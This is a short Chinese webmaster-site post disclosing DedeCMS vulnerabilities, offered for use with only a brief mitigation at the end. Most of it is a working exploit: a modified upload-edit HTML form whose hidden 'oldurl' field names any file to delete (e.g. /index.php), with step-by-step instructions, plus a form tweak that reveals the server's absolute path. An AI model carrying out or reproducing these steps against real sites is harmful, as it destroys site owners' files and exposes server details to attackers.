DEDECMS 最新漏洞可任意删除文件

17482123

DEDECMS 最新漏洞,可任意删除文件。DEDE在五月发布了最新的补丁。可是这个补丁并没有用。现在将些BUG发布出来。
    1.删除网站任意文件.
    2.显示对路径
    1.删除任意文件.
    注册正常用户...随意找个地方上传个附件就OK.
    部分代码:
     form class=mTB10 mL10 mR10 name=form1 action=uploads_edit.php method=post enctype=multipart/form-datainput type=hidden name=aid value=28 /input type=hidden name=mediatype value=1 /input type=hidden name=oldurl value=要删除的文件 / !--如value=/index.php input type=hidden name=dopost value=save /table cellspacing=1 class=submit
    修改完毕后.打开HTML页.直接点提交.
    然后在用户管理附件里点击删除.
    2.爆路径.
    也是利用原来的html代码..
    td align=right valign=top更换附件：/td tdinput name=addonfile type=file id=addonfile style=width:300px //td　把type=file删除.保存.然后打开.直接点提交.
    就可以爆路径了..
    临时解决方法.:禁止用户注册.或禁止用户发附件
    聚站吧|站长资讯交流群 欢迎大家前来交流。
    首发：聚站吧|站长资讯 如有请保留出处。